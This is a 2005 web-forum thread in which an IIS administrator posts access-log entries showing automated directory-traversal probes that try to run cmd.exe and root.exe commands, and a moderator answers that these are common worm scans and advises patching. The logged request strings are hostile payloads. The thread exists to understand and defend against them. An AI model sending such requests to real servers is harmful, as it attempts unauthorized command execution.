SunQuest
           IIS
 
Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
User Name:
Password:
Remember me
Go Back   Dev Shed ForumsSystem AdministrationIIS
Reload this Page

Help with possible attacks

Discuss Help with possible attacks in the IIS forum on Dev Shed.
Help with possible attacks IIS forum discussing Microsoft's Internet Information Server including its configuration, optimization and other related topics. IIS is the most popular web server for the Windows platform.

Reply
Add This Thread To:
  Del.icio.us   Digg   Google   Spurl   Blink   Furl   Simpy   Y! MyWeb 
« Previous Thread | Next Thread »  
Thread Tools Search this Thread Rate Thread Display Modes
 
Unread Dev Shed Forums Sponsor:
Generate data entry and reporting .NET Web apps in minutes, straight from your database. Read our FREE whitepaper “Build Web 2.0 Applications Without Hand-Coding” Download now!
  #1  
Old March 25th, 2005, 05:22 PM
slylos slylos is offline
Contributing User
Dev Shed Newbie (0 - 499 posts)
  
Join Date: Feb 2005
Location: Fort Pierce, FL
Posts: 227 slylos User rank is Private First Class (20 - 50 Reputation Level)slylos User rank is Private First Class (20 - 50 Reputation Level) 
Time spent in forums: 2 Days 4 h 8 m 51 sec
Reputation Power: 4
Help with possible attacks
I've got some strange queries in my access log in IIS's W3SVC1 folder, they are as follows:

2005-03-25 15:15:09 68.122.141.112 - 192.168.1.254 80 GET /scripts/root.exe /c+dir 404 -
2005-03-25 15:15:09 68.122.141.112 - 192.168.1.254 80 GET /MSADC/root.exe /c+dir 404 -
2005-03-25 15:15:10 68.122.141.112 - 192.168.1.254 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2005-03-25 15:15:10 68.122.141.112 - 192.168.1.254 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2005-03-25 15:15:11 68.122.141.112 - 192.168.1.254 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2005-03-25 15:15:11 68.122.141.112 - 192.168.1.254 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2005-03-25 15:15:11 68.122.141.112 - 192.168.1.254 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2005-03-25 15:15:12 68.122.141.112 - 192.168.1.254 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2005-03-25 15:15:12 68.122.141.112 - 192.168.1.254 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2005-03-25 15:15:12 68.122.141.112 - 192.168.1.254 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2005-03-25 15:15:13 68.122.141.112 - 192.168.1.254 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2005-03-25 15:15:13 68.122.141.112 - 192.168.1.254 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2005-03-25 15:15:14 68.122.141.112 - 192.168.1.254 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2005-03-25 15:15:14 68.122.141.112 - 192.168.1.254 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2005-03-25 15:15:14 68.122.141.112 - 192.168.1.254 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2005-03-25 15:15:14 68.122.141.112 - 192.168.1.254 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -

It appears they are attemping to get IIS to run a script and allow them access to what ever folder they are specifying in c+dir. . .
If I'm dead wrong, please let me know. How can I combat queries like this? Thanks for your help!!
Reply With Quote
  #2  
Old March 26th, 2005, 01:09 AM
Doug G Doug G is offline
Grumpier Old Moderator
Dev Shed God 12th Plane (10500 - 10999 posts)
  
Join Date: Jun 2003
Posts: 10,703 Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level)Doug G User rank is Brigadier General (60000 - 70000 Reputation Level) 
Time spent in forums: 4 Weeks 1 Day 21 h 33 m 53 sec
Reputation Power: 688
These are common robot attacks on your server, you must make sure all your updates are current and that you don't have any holes in your security settings.
__________________
======
Doug G
======
"Hide, hide witch! The good folk come to burn thee. Their keen enjoyment hid behind their gothic mask of duty." -Mark Clifton
Reply With Quote
Reply

Viewing: Dev Shed ForumsSystem AdministrationIIS > Help with possible attacks

« Previous Thread | Next Thread »

Thread Tools  Search this Thread 
Search this Thread:

Advanced Search
Display Modes  Rate This Thread 
Linear Mode Linear Mode
Rate This Thread:


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
View Your Warnings | New Posts | Latest News | Latest Threads | Shoutbox
Forum Jump


Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
  
 





© 2003-2008 by Developer Shed. All rights reserved. DS Cluster 3 hosted by Hostway